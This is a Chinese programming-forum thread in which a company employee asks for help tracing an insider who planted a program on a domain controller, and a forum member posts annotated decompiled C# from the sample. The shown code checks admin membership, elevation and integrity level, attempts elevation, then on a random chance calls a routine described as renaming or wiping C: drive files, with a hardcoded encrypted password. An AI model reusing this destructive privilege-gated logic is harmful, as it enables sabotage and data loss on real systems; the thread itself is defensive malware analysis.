标题:最近被内部攻击,截得该程序一个!请大婶们帮忙分析下有关制作者信息。
只看楼主
dtyxf008
Rank: 1
等 级:新手上路
帖 子:4
专家分:0
注 册:2010-3-25
 问题点数:0 回复次数:15 
最近被内部攻击,截得该程序一个!请大婶们帮忙分析下有关制作者信息。
小弟最近公司内部受到来自内部人员的攻击,这个人在域控制器上放入了以下这个小程序。由于小弟对编程不懂,所以求大神们帮我查查看,能否查到有关制作者的信息!我想抓出来这个王八蛋! 辛苦了 各位!

以下是附件,附件内包含两个程序。其中csc.exe是放入域控内的病毒程序,另一个是“嫌疑犯”之前所编写的程序,发出来的意思想各位能够对比下,看看 是否均为一个人的编写习惯! 小弟十分感谢了!
病毒程序.rar (23.97 KB)

小弟联系QQ:110 139 416
搜索更多相关主题的帖子: 控制器 王八蛋 嫌疑犯 信息 
2013-11-27 18:50
dtyxf008
Rank: 1
等 级:新手上路
帖 子:4
专家分:0
注 册:2010-3-25
得分:0 
沙发自己顶下!
2013-11-28 11:49
m564522634
Rank: 2
等 级:论坛游民
帖 子:34
专家分:16
注 册:2010-9-1
得分:0 
只能说明自己菜,搞不了就叫攻击你的那个人当老大。
2013-12-12 16:04
wangnannan
Rank: 18Rank: 18Rank: 18Rank: 18Rank: 18
等 级:贵宾
威 望:87
帖 子:2545
专家分:9359
注 册:2007-11-3
得分:0 
源码呢 替你反编译出来了
没在注释上看到是谁开发的 根本也就没有注释 看两个EXE代码风格呢 像是一个人写的
我重点分析了下 CSC这个EXE 主函数这些的是这个代码  我加了注释
有点意思 大家看看
程序代码:
 private void MainForm_Load(object sender, EventArgs e)
        {
            Exception exception;
            try
            {
                //这里判断你当前的用户是不是管理员组的
                this.lbInAdminGroup.Text = this.IsUserInAdminGroup().ToString();
            }
            catch (Exception exception1)
            {
                exception = exception1;
                this.lbInAdminGroup.Text = "N/A";
                MessageBox.Show(exception.Message, "An error occurred in IsUserInAdminGroup", MessageBoxButtons.OK, MessageBoxIcon.Hand);
            }
            try
            {
                this.lbIsRunAsAdmin.Text = this.IsRunAsAdmin().ToString();
            }
            catch (Exception exception2)
            {
                exception = exception2;
                this.lbIsRunAsAdmin.Text = "N/A";
                MessageBox.Show(exception.Message, "An error occurred in IsRunAsAdmin", MessageBoxButtons.OK, MessageBoxIcon.Hand);
            }
  //操作系统的版本
            if (Environment.OSVersion.Version.Major >= 6)
            {
                try
                {
                    bool flag3 = this.IsProcessElevated();
                    this.lbIsElevated.Text = flag3.ToString();
                    this.btnElevate.FlatStyle = FlatStyle.System;
                    CSUACSelfElevation.NativeMethods.SendMessage(this.btnElevate.Handle, 0x160c, 0, flag3 ? IntPtr.Zero : ((IntPtr) 1));
                }
                catch (Exception exception3)
                {
                    exception = exception3;
                    this.lbIsElevated.Text = "N/A";
                    MessageBox.Show(exception.Message, "An error occurred in IsProcessElevated", MessageBoxButtons.OK, MessageBoxIcon.Hand);
                }
                try
                {
//进程级别 他想干啥?
                    switch (this.GetProcessIntegrityLevel())
                    {
                        case 0x2000:
                            this.lbIntegrityLevel.Text = "Medium";
                            goto Label_0238;

                        case 0x3000:
                            this.lbIntegrityLevel.Text = "High";
                            goto Label_0238;

                        case 0x4000:
                            this.lbIntegrityLevel.Text = "System";
                            goto Label_0238;

                        case 0:
                            this.lbIntegrityLevel.Text = "Untrusted";
                            goto Label_0238;

                        case 0x1000:
                            this.lbIntegrityLevel.Text = "Low";
                            goto Label_0238;
                    }
                    this.lbIntegrityLevel.Text = "Unknown";
                }
                catch (Exception exception4)
                {
                    exception = exception4;
                    this.lbIntegrityLevel.Text = "N/A";
                    MessageBox.Show(exception.Message, "An error occurred in GetProcessIntegrityLevel", MessageBoxButtons.OK, MessageBoxIcon.Hand);
                }
            }
            else
            {
                this.lbIsElevated.Text = "N/A";
                this.lbIntegrityLevel.Text = "N/A";
            }
        Label_0238:
            if (!this.IsUserInAdminGroup())
            {
//如果用户不是管理员组的 那就登录一个网站 你可以看我结尾的图
                this.admingroup_elevate();
            }
            if (!(this.IsProcessElevated() || !this.IsUserInAdminGroup()))
            {
                this.iselevated_elevate();
            }
            if ((((this.lbInAdminGroup.Text == "True") && (this.lbIsElevated.Text == "True")) && (this.lbIsRunAsAdmin.Text == "True")) && (this.rand.Next(5) == this.rand.Next(5)))
            {
//看到这里就知道了 以上几个条件都满足 删掉你C盘文件
                this.AccessFileSystem();
            }
            Application.Exit();
        }



[ 本帖最后由 wangnannan 于 2014-1-3 10:47 编辑 ]

出来混,谁不都要拼命的嘛。 。拼不赢?那就看谁倒霉了。 。有机会也要看谁下手快,快的就能赢,慢。 。狗屎你都抢不到。 。还说什么拼命?
2014-01-03 10:08
wangnannan
Rank: 18Rank: 18Rank: 18Rank: 18Rank: 18
等 级:贵宾
威 望:87
帖 子:2545
专家分:9359
注 册:2007-11-3
得分:0 
代码里面呢 有获取进程的安全级别 当前用户是否是管理员 是否是管理员组 this.passenc = StringCipher.Decrypt("WQX5MB+/mRqHlZsEo7qy8eixfMthsqfr2RJg4E4CsmyY6cBlpIPdeaq+N/EeX7dK", "fuck_yilin");
 

[ 本帖最后由 wangnannan 于 2014-1-3 10:50 编辑 ]

出来混,谁不都要拼命的嘛。 。拼不赢?那就看谁倒霉了。 。有机会也要看谁下手快,快的就能赢,慢。 。狗屎你都抢不到。 。还说什么拼命?
2014-01-03 10:16
wangnannan
Rank: 18Rank: 18Rank: 18Rank: 18Rank: 18
等 级:贵宾
威 望:87
帖 子:2545
专家分:9359
注 册:2007-11-3
得分:0 

出来混,谁不都要拼命的嘛。 。拼不赢?那就看谁倒霉了。 。有机会也要看谁下手快,快的就能赢,慢。 。狗屎你都抢不到。 。还说什么拼命?
2014-01-03 10:21
wangnannan
Rank: 18Rank: 18Rank: 18Rank: 18Rank: 18
等 级:贵宾
威 望:87
帖 子:2545
专家分:9359
注 册:2007-11-3
得分:0 


先获取你C盘文件夹目录

[ 本帖最后由 wangnannan 于 2014-1-3 10:30 编辑 ]

出来混,谁不都要拼命的嘛。 。拼不赢?那就看谁倒霉了。 。有机会也要看谁下手快,快的就能赢,慢。 。狗屎你都抢不到。 。还说什么拼命?
2014-01-03 10:28
wangnannan
Rank: 18Rank: 18Rank: 18Rank: 18Rank: 18
等 级:贵宾
威 望:87
帖 子:2545
专家分:9359
注 册:2007-11-3
得分:0 
[attach]74250[/attach]在通过实时获取当前系统用户级别 重命名你的文件

[ 本帖最后由 wangnannan 于 2014-1-6 13:53 编辑 ]

出来混,谁不都要拼命的嘛。 。拼不赢?那就看谁倒霉了。 。有机会也要看谁下手快,快的就能赢,慢。 。狗屎你都抢不到。 。还说什么拼命?
2014-01-03 10:30
wangnannan
Rank: 18Rank: 18Rank: 18Rank: 18Rank: 18
等 级:贵宾
威 望:87
帖 子:2545
专家分:9359
注 册:2007-11-3
得分:0 
获取系统目录的代码

出来混,谁不都要拼命的嘛。 。拼不赢?那就看谁倒霉了。 。有机会也要看谁下手快,快的就能赢,慢。 。狗屎你都抢不到。 。还说什么拼命?
2014-01-03 10:31
wangnannan
Rank: 18Rank: 18Rank: 18Rank: 18Rank: 18
等 级:贵宾
威 望:87
帖 子:2545
专家分:9359
注 册:2007-11-3
得分:0 
去掉隐藏代码后的窗体 看英文就不用我多说了吧


[ 本帖最后由 wangnannan 于 2014-1-3 10:35 编辑 ]

出来混,谁不都要拼命的嘛。 。拼不赢?那就看谁倒霉了。 。有机会也要看谁下手快,快的就能赢,慢。 。狗屎你都抢不到。 。还说什么拼命?
2014-01-03 10:34



参与讨论请移步原网站贴子:https://bbs.bccn.net/thread-424302-1-1.html




关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.064863 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved